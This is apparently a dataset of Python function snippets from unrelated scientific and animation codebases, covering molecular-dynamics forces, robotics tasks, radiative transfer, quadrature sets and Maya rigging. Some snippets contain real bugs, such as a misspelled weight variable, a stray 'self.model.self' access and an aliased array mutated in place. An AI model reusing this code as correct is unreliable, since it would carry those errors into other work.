and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n shift = math.floor(strain*sc) # Strain measured in cell lengths\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d.copy() # Standard list copied, including extra 3 cells\n dd[5:,0] = d[5:,0] - shift # All those looking up need adjustment in the x direction\n else: # i-cell is not in top layer\n dd = d[:-3,:].copy() # Last three extra cells are not needed; shift is not needed\n \n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij[:,:,0] = rij[:,:,0] - np.rint(rij[:,:,1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid 
divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = np.where ( in_range, pot+0.25, 0.0 ) # WCA LJ pair potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n pyx = rij[:,:,1]*fij[:,:,0] # Off-diagonal element of pressure tensor\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( pot=np.sum(pot)/2, vir=np.sum(vir)/2, \n pyx=np.sum(pyx)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( pot=np.sum(pot), vir=np.sum(vir), \n pyx=np.sum(pyx), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d # Standard list copied, including extra 3 cells\n dd[5:,0] = dd[5:,0] - shift # All those looking up need adjustment in the x direction\n else:\n dd = d[:-3,:] # Last three extra cells are not needed; shift is not needed\n\n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij[0] = rij[0] - np.rint(rij[1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 
2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = pot + 0.25 # WCA LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n pyx = rij[1]*fij[0] # Off-diagonal element of pressure tensor\n total = total + PotentialType ( pot=pot, vir=vir, pyx=pyx, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.pyx = total.pyx * 24.0 # 24*epsilon\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f", "def __init__(self, reference={\"mass\":[], \"size\":[]},\n mode=0,\n variables_space='space_a_b',\n fractional_reward_weight=1,\n dense_reward_weights=np.array([750, 250,\n 250, 125,\n 0.005]),\n activate_sparse_reward=False,\n tool_block_mass=0.02,\n tool_block_shape = \"cube\",\n tool_block_size=0.065,\n joint_positions=None,\n tool_block_1_position=np.array([0, 0, 0.0325]),\n tool_block_1_orientation=np.array([0, 0, 0, 1]),\n tool_block_2_position=np.array([0.01, 0.08, 0.0325]),\n tool_block_2_orientation=np.array([0, 0, 0, 1]),\n goal_position=np.array([-0.06, -0.06, 0.0325]),\n goal_orientation=np.array([0, 0, 0, 1])):\n super().__init__(task_name=\"stacking2\",\n variables_space=variables_space,\n fractional_reward_weight=fractional_reward_weight,\n dense_reward_weights=dense_reward_weights,\n activate_sparse_reward=activate_sparse_reward,\n reference=reference,\n mode=mode)\n self._task_robot_observation_keys = [\"time_left_for_task\",\n \"joint_positions\",\n \"joint_velocities\",\n \"end_effector_positions\"]\n self._task_params[\"tool_block_mass\"] = tool_block_mass\n self._task_params[\"tool_block_shape\"] = tool_block_shape\n self._task_params[\"tool_block_size\"] = tool_block_size\n self._task_params[\"joint_positions\"] = joint_positions\n self._task_params[\"tool_block_1_position\"] = tool_block_1_position\n self._task_params[\"tool_block_1_orientation\"] = tool_block_1_orientation\n self._task_params[\"tool_block_2_position\"] = tool_block_2_position\n self._task_params[\"tool_block_2_orientation\"] = tool_block_2_orientation\n self._task_params[\"goal_position\"] = goal_position\n self._task_params[\"goal_orientation\"] = goal_orientation\n self._task_params[\"tool_block_size\"] = tool_block_size\n self.previous_tool_block_1_position = None\n self.previous_tool_block_2_position = None\n self.previous_end_effector_positions = None\n self.previous_joint_velocities = None", "def cal_B(self):\n self.B = np.zeros((self.point_matrix.shape[0],\n self.attach_points.shape[0],\n self.point_matrix.shape[1]\n * self.attach_points.shape[0]))\n for i in range(0, self.point_matrix.shape[0]):\n self.B[i, :, :] = block_diag(* self.L[i, :, :])\n self.L_tether = self.L[:, self.attach_points[:, 3] == 0, :]\n self.L_tube = self.L[:, self.attach_points[:, 3] == 1, :]\n\n self.B_tether = np.zeros((self.point_matrix.shape[0],\n self.attach_points_tether.shape[0],\n self.point_matrix.shape[1]\n * self.attach_points_tether.shape[0]))\n for i in range(0, self.point_matrix.shape[0]):\n self.B_tether[i, :, :] = block_diag(* self.L_tether[i, :, :])\n\n self.B_tube = np.zeros((self.point_matrix.shape[0],\n self.attach_points_tube.shape[0],\n self.point_matrix.shape[1]\n * self.attach_points_tube.shape[0]))\n for i in range(0, self.point_matrix.shape[0]):\n 
self.B_tube[i, :, :] = block_diag(* self.L_tube[i, :, :])", "def __init__(self, **kwargs):\n super(VeryCleverBeamsplitter, self).__init__(**kwargs)\n self.shader_source = IL_SHADER_SOURCE\n self.centre = [0.5, 0.5]\n self.blazing_function = np.linspace(0,1,32)\n self.zernike_coefficients = np.zeros(12)", "def Build_quadrant(self) :\n\n self.omega = np.zeros((self.n_dir,3))\n self.weight = np.zeros((self.n_dir))\n\n if self.sn==2 :\n direction = 0.577350269189625764509149\n weight = 1.\n\n self.omega[0,0] = direction\n self.omega[0,1] = direction\n self.omega[0,2] = direction\n \n self.weight[0] = weight\n \n elif self.sn==4 :\n direction_1 = 0.350021174581540677777041\n direction_2 = 0.868890300722201205229788\n weight = 1./3.\n\n self.omega[0,0] = direction_2\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_1\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_1\n self.omega[2,2] = direction_2\n\n self.weight[0] = weight\n self.weight[1] = weight\n self.weight[2] = weight\n\n elif self.sn==6 :\n direction_1 = 0.266635401516704720331535\n direction_2 = 0.681507726536546927403750\n direction_3 = 0.926180935517489107558380\n weight_1 = 0.176126130863383433783565\n weight_2 = 0.157207202469949899549768\n\n self.omega[0,0] = direction_3\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_2\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_1\n self.omega[3,2] = direction_2\n \n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_2\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_1\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_3\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_1\n self.weight[3] = weight_2\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n\n elif self.sn==8 :\n direction_1 = 0.218217890235992381266097\n direction_2 = 0.577350269189625764509149\n direction_3 = 0.786795792469443145800830\n direction_4 = 0.951189731211341853132399\n\n weight_1 = 0.120987654320987654320988\n weight_2 = 0.0907407407407407407407407\n weight_3 = 0.0925925925925925925925926\n\n self.omega[0,0] = direction_4\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_3\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_2\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_1\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_3\n self.omega[4,1] = direction_1\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_2\n self.omega[5,1] = direction_2\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_1\n self.omega[6,1] = direction_3\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_1\n self.omega[7,2] = direction_3\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_2\n self.omega[8,2] = direction_3\n\n self.omega[9,0] = direction_1\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_2\n self.weight[3] = weight_1\n self.weight[4] = weight_2\n 
self.weight[5] = weight_3\n self.weight[6] = weight_2\n self.weight[7] = weight_2\n self.weight[8] = weight_2\n self.weight[9] = weight_1\n\n elif self.sn==10 :\n direction_1 = 0.189321326478010476671494\n direction_2 = 0.508881755582618974382711\n direction_3 = 0.694318887594384317279217\n direction_4 = 0.839759962236684758403029\n direction_5 = 0.963490981110468484701598\n\n weight_1 = 0.0893031479843567214704325\n weight_2 = 0.0725291517123655242296233\n weight_3 = 0.0450437674364086390490892\n weight_4 = 0.0539281144878369243545650\n\n self.omega[0,0] = direction_5\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_4\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_3\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n \n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_5\n self.omega[4,2] = direction_1\n\n self.omega[5,0] = direction_4\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_3\n self.omega[6,1] = direction_2\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_3\n self.omega[7,2] = direction_2\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_4\n self.omega[8,2] = direction_2\n\n self.omega[9,0] = direction_3\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_3\n\n self.omega[10,0] = direction_2\n self.omega[10,1] = direction_2\n self.omega[10,2] = direction_3\n\n self.omega[11,0] = direction_1\n self.omega[11,1] = direction_3\n self.omega[11,2] = direction_3\n\n self.omega[12,0] = direction_2\n self.omega[12,1] = direction_1\n self.omega[12,2] = direction_4\n\n self.omega[13,0] = direction_1\n self.omega[13,1] = direction_2\n self.omega[13,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_2\n self.weight[4] = weight_1\n self.weight[5] = weight_2\n self.weight[6] = weight_4\n self.weight[7] = weight_4\n self.weight[8] = weight_2\n self.weight[9] = weight_3\n self.weight[10] = weight_4\n self.weight[11] = weight_3\n self.weight[12] = weight_2\n self.weight[13] = weight_2\n self.weight[14] = weight_1\n\n elif self.sn==12 :\n direction = np.zeros((6,1))\n\n direction[0] = 0.167212652822713264084504\n direction[1] = 0.459547634642594690016761\n direction[2] = 0.628019096642130901034766\n direction[3] = 0.760021014833664062877138\n direction[4] = 0.872270543025721502340662\n direction[5] = 0.971637719251358378302376\n\n weight_1 = 0.0707625899700910439766549\n weight_2 = 0.0558811015648888075828962\n weight_3 = 0.0373376737588285824652402\n weight_4 = 0.0502819010600571181385765\n weight_5 = 0.0258512916557503911218290\n\n for i in xrange(0,6) :\n self.omega[i,0] = direction[5-i]\n self.omega[i,1] = direction[i]\n self.omega[i,2] = direction[0]\n \n offset = 6\n for i in xrange(0,5) :\n self.omega[offset+i,0] = direction[4-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[1]\n\n offset += 5\n for i in xrange(0,4) :\n self.omega[offset+i,0] = direction[3-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[2]\n \n offset += 4\n for i in xrange(0,3) :\n self.omega[offset+i,0] = direction[2-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[3]\n\n offset += 3\n for i in xrange(0,2) :\n 
self.omega[offset+i,0] = direction[1-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[4]\n \n offset += 2\n self.omega[offset+i,0] = direction[0]\n self.omega[offset+i,1] = direction[1]\n self.omega[offset+i,2] = direction[5]\n\n self.weight[0] = weigth_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_3\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n self.weight[6] = weight_2\n self.weight[7] = weight_4\n self.weight[8] = weight_5\n self.weight[9] = weight_4\n self.weight[10] = weight_2\n self.weight[11] = weight_3\n self.weight[12] = weight_5\n self.weight[13] = weight_5\n self.weight[14] = weight_3\n self.weight[15] = weight_3\n self.weight[16] = weight_4\n self.weight[17] = weight_3\n self.weight[18] = weight_2\n self.weight[19] = weight_2\n self.weight[20] = weight_1", "def fit(self, h_init):\n M = h_init.shape[0]\n\n cn_states = self.create_cn_states(M, 2, self.max_copy_number, self.max_copy_number_diff)\n cn_states = np.array([cn_states] * self.N)\n cn_states[:, :, 0, :] = self.normal_copies[:, np.newaxis, :]\n\n # Remap cn states\n cn_states = cn_states[self.seg_rev_remap, :, :, :]\n\n brk_states = self.create_brk_states(M, self.max_copy_number, self.max_copy_number_diff)\n\n self.model = remixt.bpmodel.RemixtModel(\n M,\n self.N1,\n self.num_breakpoints,\n self.normal_contamination,\n cn_states,\n brk_states,\n h_init,\n self.l1,\n self.x1[:, 2],\n self.x1[:, 0:2],\n self.is_telomere,\n self.breakpoint_idx,\n self.breakpoint_orient,\n self.transition_log_prob,\n self.divergence_weight,\n )\n\n self.model.total_likelihood_mask = self._total_likelihood_mask.astype(int)\n self.model.allele_likelihood_mask = self._allele_likelihood_mask.astype(int)\n\n if self.breakpoint_init is not None:\n p_breakpoint = np.ones((self.model.self.num_breakpoints, self.model.num_brk_states))\n brk_states = np.array(self.model.brk_states)\n\n for k, bp in enumerate(self.breakpoints):\n cn = self.breakpoint_init[bp]\n\n for s in range(self.model.num_brk_states):\n if np.all(cn == brk_states[s]):\n p_breakpoint[k, s] = 1000.\n\n p_breakpoint /= np.sum(p_breakpoint, axis=-1)[:, np.newaxis]\n\n self.model.p_breakpoint = p_breakpoint\n\n self.model.transition_model = self.transition_model\n\n if self.prev_elbo is None:\n self.prev_elbo = self.model.calculate_elbo()\n\n for i in range(self.num_em_iter):\n for j in range(self.num_update_iter):\n self.variational_update()\n\n if self.do_h_update:\n self.em_update_h()\n\n self.em_update_params()\n\n elbo = self.model.calculate_elbo()\n\n self.prev_elbo_diff = elbo - self.prev_elbo\n self.prev_elbo = elbo\n\n print ('[{}] completed iteration {}'.format(_gettime(), i))\n print ('[{}] elbo: {:.10f}'.format(_gettime(), self.prev_elbo))\n print ('[{}] elbo diff: {:.10f}'.format(_gettime(), self.prev_elbo_diff))\n print ('[{}] h = {}'.format(_gettime(), np.asarray(self.model.h)))\n for name, value in self.get_likelihood_param_values().items():\n print ('[{}] {} = {}'.format(_gettime(), name, value))", "def _propagate_step(self):\n\n # optical depth to next interaction\n self.tau = -np.log(self.RNG.rand(self.N_active))\n # optical depth to sphere edge\n self.tau_edge = np.sqrt(self.tau_sphere**2 - self.tau_i**2 *\n (1. 
- self.mu_i**2)) - self.tau_i * self.mu_i\n\n # identify packets that escape\n self.esc_mask = self.tau_edge < self.tau\n # update number of escaping packets\n self.N_esc += self.esc_mask.sum()\n\n # identify interacting packets\n self.nesc_mask = np.logical_not(self.esc_mask)\n\n # decide which interacting packets scatter and which get absorbed\n self.abs_mask = self.RNG.rand(self.nesc_mask.sum()) >= self.albedo\n self.scat_mask = np.logical_not(self.abs_mask)\n\n # select properties of scattering packets\n self.tau = self.tau[self.nesc_mask][self.scat_mask]\n self.tau_i = self.tau_i[self.nesc_mask][self.scat_mask]\n self.mu_i = self.mu_i[self.nesc_mask][self.scat_mask]\n\n # update number of active packets\n self.N_active = self.scat_mask.sum()\n\n # update properties (position in optical depth space, propagation\n # direction) of scattering packets\n self.tau_i = np.sqrt(self.tau_i**2 + self.tau**2 +\n 2. * self.tau * self.tau_i * self.mu_i)\n self.mu_i = 2 * self.RNG.rand(self.N_active) - 1.", "def set_wl_bounds(self):\n wls = self.xds['wl'].values\n min_wl, max_wl = min(wls), max(wls)\n center = (max_wl+min_wl)/2\n min_wl, max_wl, center = round(min_wl), round(max_wl), round(center)\n self.param.band.bounds = (min_wl, max_wl)\n self.band = center - self.bw/2, center + self.bw/2\n self.center = center", "def center_barrier( self, verbose=False ):\n reactant_indicator, product_indicator = self.get_basin_indicators(self.init_path)\n n_react = np.sum(reactant_indicator)\n n_prod = np.sum(product_indicator)\n diff = np.abs(n_react-n_prod)\n delta = int(diff/2)\n basin = \"\"\n if ( n_react > n_prod ):\n # Remove the first slices from the reactant side\n self.init_path[\"energy\"] = self.init_path[\"energy\"][delta:]\n self.init_path[\"symbols\"] = self.init_path[\"symbols\"][delta:]\n self.nuc_mc.set_state( self.init_path[\"symbols\"][-1] )\n self.nuc_mc.current_energy = self.init_path[\"energy\"][-1]\n basin = \"product\"\n elif ( n_prod > n_react ):\n # Remove the last slices from the product side\n self.init_path[\"energy\"] = self.init_path[\"energy\"][:-delta]\n self.init_path[\"symbols\"] = self.init_path[\"symbols\"][:-delta]\n self.nuc_mc.set_state( self.init_path[\"symbols\"][0] )\n self.nuc_mc.current_energy = self.init_path[\"energy\"][0]\n basin = \"reactant\"\n\n new_path = {\"symbols\":[], \"energy\":[]}\n for i in range(delta):\n self.nuc_mc.network.reset()\n self.nuc_mc.sweep(nsteps=self.nsteps_per_sweep)\n self.nuc_mc.network(None)\n print(self.nuc_mc.network.get_statistics())\n new_path[\"energy\"].append(self.nuc_mc.current_energy)\n new_path[\"symbols\"].append( [atom.symbol for atom in self.nuc_mc.atoms] )\n\n if basin == \"reactant\":\n if not self.nuc_mc.is_reactant():\n raise RuntimeError(\"System leaving reactants, when starting inside the basin!\")\n elif basin == \"product\":\n if not self.nuc_mc.is_product():\n raise RuntimeError(\"System leaving products when starting inside basin!\")\n\n if basin == \"reactant\":\n self.log(\"Inserting {} states in the beginning of the trajectory\".format(delta))\n self.init_path[\"energy\"] = new_path[\"energy\"][::-1]+self.init_path[\"energy\"]\n self.init_path[\"symbols\"] = new_path[\"symbols\"][::-1]+self.init_path[\"symbols\"]\n else:\n self.init_path[\"energy\"] = self.init_path[\"energy\"]+new_path[\"energy\"]\n self.init_path[\"symbols\"] = self.init_path[\"symbols\"]+new_path[\"symbols\"]\n self.log(\"Appending {} states to the end of the trajectory\".format(delta))", "def form_segment(self,aShapers = 
'numShapers',aSubShapers = 'numSubShapers',\n loftShape=None,l_basePos = None, baseSize=1.0,\n sizeWidth = 1.0, sizeLoft=1.0,\n side = None,orientHelperPlug = 'orientHelper',formAim='toEnd',\n mFormNull = None,mNoTransformNull = None,\n mDefineEndObj=None):\n _str_func = 'form_segment'\n log.debug(\"|{0}| >> self: {1}\".format(_str_func,self)+ '-'*80)\n _short = self.p_nameShort\n mc.select(cl=1)#...why maya....\n #_size_handle = baseSize\n #_size_loft = sizeLoft\n _size_width = sizeWidth\n \n _size_handle = 1.0\n _size_loft = 1.0\n \n _side = side\n _loftShape = loftShape\n _l_basePos = l_basePos\n md_handles = {}\n ml_handles = []\n ml_loftHandles = []\n md_loftHandles ={}\n ml_shapers = []\n ml_handles_chain = []\n _formAim = formAim\n \n _short = self.mNode \n _int_shapers = self.getMayaAttr(aShapers)\n _int_sub = self.getMayaAttr(aSubShapers) \n _loftSetup = self.getEnumValueString('loftSetup')\n _loftShape = self.getEnumValueString('loftShape')\n \n _baseName = self.cgmName\n if not _baseName:\n _baseName = self.blockType\n \n #Loft Shapes...-----------------------------------------------------------------------\n if _loftSetup == 'loftList':\n _l_loftShapes = ATTR.datList_get(_short,'loftList',enum=True) or []\n if len(_l_loftShapes) != _int_shapers:\n log.warning(\"|{0}| >> Not enough shapes in loftList. Padding with loftShape\".format(_str_func,i,_loftShape))\n while len(_l_loftShapes) < _int_shapers:\n _l_loftShapes.append(self.loftShape)\n else:\n _l_loftShapes = [_loftShape for i in range(_int_shapers)]\n\n log.debug(\"|{0}| >> loftShapes: {1}\".format(_str_func,_l_loftShapes)) \n \n #Subshaper count -------------------------------------------------------------------------\n l_numSubShapers = self.datList_get('numSubShapers')\n int_shapers = self.getMayaAttr(aShapers)\n int_sub = self.getMayaAttr(aSubShapers)\n if not l_numSubShapers:\n l_numSubShapers = [int_sub for i in xrange(int_shapers-1)]\n log.info(\"|{0}| >> l_numSubShapers: {1}\".format(_str_func,l_numSubShapers)) \n\n \n mHandleFactory = self.asHandleFactory()\n mRootUpHelper = self.vectorUpHelper\n #_mVectorAim = MATH.get_obj_vector(self.vectorEndHelper.mNode,asEuclid=True)\n _mVectorUp = MATH.get_obj_vector(mRootUpHelper.mNode,'y+',asEuclid=True) \n #pprint.pprint(vars())\n for i,n in enumerate(['start','end']):\n log.debug(\"|{0}| >> {1}:{2}...\".format(_str_func,i,n)) \n #mHandle = mHandleFactory.buildBaseShape('sphere2',baseSize = _size_handle, shapeDirection = 'y+')\n crv = CURVES.create_fromName('sphere2', [_size_handle,_size_handle,.2* _size_handle], direction = 'y+',baseSize=1)\n mHandle = cgmMeta.validateObjArg(crv, 'cgmObject', setClass=True)\n \n mHandle.p_parent = mFormNull\n \n mHandle.resetAttrs()\n \n self.copyAttrTo('cgmName',mHandle.mNode,'cgmName',driven='target')\n mHandle.doStore('cgmType','formHandle')\n mHandle.doStore('cgmNameModifier',n)\n \n mHandle.doName()\n \n #Convert to loft curve setup ----------------------------------------------------\n mHandleFactory.setHandle(mHandle.mNode)\n #mHandleFactory = self.asHandleFactory(mHandle.mNode)\n if n == 'start':\n _shape = 'loft' + _l_loftShapes[0][0].capitalize() + ''.join(_l_loftShapes[0][1:])\n else:\n _shape = 'loft' + _l_loftShapes[-1][0].capitalize() + ''.join(_l_loftShapes[-1][1:])\n \n mLoftCurve = mHandleFactory.rebuildAsLoftTarget(_shape, _size_loft, shapeDirection = 'z+',rebuildHandle = False)\n #mc.makeIdentity(mHandle.mNode,a=True, s = True)#...must freeze scale once we're back parented and positioned\n \n 
mHandleFactory.color(mHandle.mNode) \n mHandle.p_position = _l_basePos[i]\n \n md_handles[n] = mHandle\n ml_handles.append(mHandle)\n \n md_loftHandles[n] = mLoftCurve \n ml_loftHandles.append(mLoftCurve)\n \n mLoftCurve.p_parent = mFormNull\n mTransformedGroup = mLoftCurve.getMessageAsMeta('transformedGroup')\n if not mTransformedGroup:\n mTransformedGroup = mLoftCurve.doGroup(True,True,asMeta=True,typeModifier = 'transformed',setClass='cgmObject')\n mHandle.doConnectOut('scale', \"{0}.scale\".format(mTransformedGroup.mNode))\n mc.pointConstraint(mHandle.mNode,mTransformedGroup.mNode,maintainOffset=False)\n #mc.scaleConstraint(mHandle.mNode,mTransformedGroup.mNode,maintainOffset=True)\n \n mBaseAttachGroup = mHandle.doGroup(True,True, asMeta=True,typeModifier = 'attach')\n \n #Constrain the define end to the end of the form handles\n if mDefineEndObj:\n mc.pointConstraint(md_handles['end'].mNode,mDefineEndObj.mNode,maintainOffset=False)\n\n\n #>> Base Orient Helper ============================================================================\n log.debug(\"|{0}| >> Base orient helper...\".format(_str_func) + '-'*40) \n\n mHandleFactory = self.asHandleFactory(md_handles['start'].mNode)\n mBaseOrientCurve = mHandleFactory.addOrientHelper(baseSize = _size_width,\n shapeDirection = 'y+',\n setAttrs = {'ty':_size_width})\n\n self.copyAttrTo('cgmName',mBaseOrientCurve.mNode,'cgmName',driven='target')\n mBaseOrientCurve.doName()\n\n mBaseOrientCurve.p_parent = mFormNull\n mOrientHelperAimGroup = mBaseOrientCurve.doGroup(True,asMeta=True,typeModifier = 'aim')\n mc.pointConstraint(md_handles['start'].mNode, mOrientHelperAimGroup.mNode )\n \n _const = mc.aimConstraint(ml_handles[1].mNode, mOrientHelperAimGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mRootUpHelper.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n #worldUpType = 'vector',\n #worldUpVector = [_worldUpVector.x,_worldUpVector.y,_worldUpVector.z]) \n\n self.connectChildNode(mBaseOrientCurve.mNode,orientHelperPlug)\n\n mBaseOrientCurve.setAttrFlags(['ry','rx','translate','scale','v'])\n mHandleFactory.color(mBaseOrientCurve.mNode,controlType='sub')\n mc.select(cl=True)\n\n ml_handles_chain = copy.copy(ml_handles)\n #reload(CORERIG)\n if _int_shapers > 2:\n log.debug(\"|{0}| >> more handles necessary...\".format(_str_func)) \n #Mid Track curve ============================================================================\n log.debug(\"|{0}| >> TrackCrv...\".format(_str_func)) \n _midTrackResult = CORERIG.create_at([mObj.mNode for mObj in ml_handles],'cubicTrack',#'linearTrack',\n baseName='midTrack')\n \n _midTrackCurve = _midTrackResult[0]\n mMidTrackCurve = cgmMeta.validateObjArg(_midTrackCurve,'cgmObject')\n mMidTrackCurve.rename(_baseName + 'midHandlesTrack_crv')\n mMidTrackCurve.parent = mNoTransformNull\n\n for s in _midTrackResult[1]:\n ATTR.set(s[1],'visibility',False)\n\n #>>> mid main handles =====================================================================\n l_scales = []\n for mHandle in ml_handles:\n l_scales.append(mHandle.scale)\n mHandle.scale = 1,1,1\n\n _l_posMid = CURVES.returnSplitCurveList(mMidTrackCurve.mNode,_int_shapers,markPoints = False)\n #_l_pos = [ DIST.get_pos_by_vec_dist(_pos_start, _vec, (_offsetDist * i)) for i in range(self.numControls-1)] + 